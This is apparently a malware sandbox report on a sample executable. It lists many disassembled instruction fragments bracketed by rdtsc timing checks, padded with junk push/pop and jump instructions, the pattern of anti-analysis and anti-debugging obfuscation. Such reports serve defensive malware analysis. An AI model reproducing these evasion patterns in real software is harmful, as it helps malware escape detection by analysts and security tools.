Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CAA527 second address: CAA55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F43E8C1FDDEh 0x0000000e push 00000000h 0x00000010 jmp 00007F43E8C1FDDFh 0x00000015 push 00000000h 0x00000017 mov ebx, esi 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CAA55A second address: CAA564 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA790D second address: CA7912 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA7912 second address: CA792F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43E91C5463h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA792F second address: CA7936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA59C4 second address: CA59D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C4F891 second address: C4F89B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547A2 second address: C547AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547AC second address: C547D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43E8C1FDD6h 0x0000000a popad 0x0000000b push ebx 0x0000000c jng 00007F43E8C1FDD6h 0x00000012 jne 00007F43E8C1FDD6h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F43E8C1FDDEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547D7 second address: C547DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547DB second address: C547E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547E7 second address: C547ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547ED second address: C547F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C547F1 second address: C547F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C10 second address: CB5C2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C2F second address: CB5C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C39 second address: CB5C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C3D second address: CB5C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C41 second address: CB5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C47 second address: CB5C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5C4D second address: CB5C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5E9E second address: CB5EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB5FC8 second address: CB5FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB7C11 second address: CB7C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CB7C15 second address: CB7C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F43E8C1FDEFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC905 second address: CBC909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC909 second address: CBC91D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F43E8C1FDD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC91D second address: CBC921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC921 second address: CBC927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC927 second address: CBC92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CBC92D second address: CBC938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC404C second address: CC4069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F43E91C545Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC2D76 second address: CC2D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F43E8C1FDD6h 0x0000000a jns 00007F43E8C1FDD6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC2D89 second address: CC2D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC373F second address: CC3745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3890 second address: CC3896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3B79 second address: CC3B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3B7F second address: CC3BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43E91C545Fh 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F43E91C545Ch 0x00000013 jne 00007F43E91C5456h 0x00000019 popad 0x0000001a jmp 00007F43E91C5462h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jl 00007F43E91C545Ch 0x00000028 jc 00007F43E91C5456h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3D3C second address: CC3D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F43E8C1FDD8h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3D4C second address: CC3D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F43E91C5456h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3E9B second address: CC3EA7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F43E8C1FDD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3EA7 second address: CC3EDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5467h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007F43E91C5456h 0x00000012 jmp 00007F43E91C545Dh 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3EDD second address: CC3EE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC3EE3 second address: CC3EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C59A92 second address: C59AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F43E8C1FDD6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F43E8C1FDD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C59AA7 second address: C59AB7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC83BD second address: CC83C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC83C1 second address: CC83EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F43E91C5456h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F43E91C545Eh 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007F43E91C5456h 0x00000021 jmp 00007F43E91C545Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC855F second address: CC8565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC86BB second address: CC86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC8858 second address: CC885E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC885E second address: CC8868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC9126 second address: CC912A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC9294 second address: CC929A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CC929A second address: CC92A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CC92A0 second address: CC92B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F43E91C545Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CC92B3 second address: CC92CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F43E8C1FDD6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F43E8C1FDDAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CC9427 second address: CC943E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F43E91C5456h 0x00000009 jg 00007F43E91C5456h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CC97E3 second address: CC97F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F43E8C1FDDEh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CC97F9 second address: CC9824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jng 00007F43E91C546Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CCE43D second address: CCE45F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43E8C1FDD6h 0x00000008 jmp 00007F43E8C1FDDEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F43E8C1FDD6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CCE921 second address: CCE926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CCE926 second address: CCE93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E8C1FDE2h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CCEF7F second address: CCEF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F43E91C5456h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CD28BA second address: CD28BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9BF2E second address: C9BF58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7DE1DFEAh 0x0000000f sub dword ptr [ebp+122D3085h], esi 0x00000015 push 52CCAD9Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43E91C545Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C099 second address: C9C09F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C09F second address: C9C0F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F43E91C5458h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 pushad 0x00000027 movsx ebx, si 0x0000002a jng 00007F43E91C5459h 0x00000030 adc ch, 0000001Ah 0x00000033 popad 0x00000034 jmp 00007F43E91C5463h 0x00000039 nop 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C0F8 second address: C9C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C0FC second address: C9C106 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C106 second address: C9C12F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F43E8C1FDE1h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jp 00007F43E8C1FDDCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C2A6 second address: C9C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F43E91C5456h 0x00000009 jno 00007F43E91C5456h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 js 00007F43E91C546Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F43E91C5456h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9C3E2 second address: C9C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ecx, dword ptr [ebp+122D1B16h] 0x0000000e push 00000004h 0x00000010 add di, 4566h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F43E8C1FDDCh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: C9CB20 second address: C9CB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push esi 0x0000000a pop edi 0x0000000b or ch, FFFFFFB8h 0x0000000e lea eax, dword ptr [ebp+124816C1h] 0x00000014 xor dword ptr [ebp+122D2FAAh], edi 0x0000001a push eax 0x0000001b push esi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f je 00007F43E91C5456h 0x00000025 popad 0x00000026 pop esi 0x00000027 mov dword ptr [esp], eax 0x0000002a xor dword ptr [ebp+12448363h], eax 0x00000030 lea eax, dword ptr [ebp+1248167Dh] 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F43E91C5458h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 sub edx, 5845AE16h 0x00000056 jp 00007F43E91C545Ch 0x0000005c mov edx, dword ptr [ebp+122D1C81h] 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CD3344 second address: CD3348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CD3348 second address: CD334E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CD334E second address: CD3353 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CD34BD second address: CD34C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F43E91C5456h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CD34C7 second address: CD34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F43E8C1FDD6h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F43E8C1FDE5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CDDB91 second address: CDDB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CDDE60 second address: CDDE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CDDE6C second address: CDDE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CDDE70 second address: CDDE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE0239 second address: CE0247 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE0247 second address: CE024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe RDTSC instruction interceptor: First address: CE41F4 second address: CE41F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
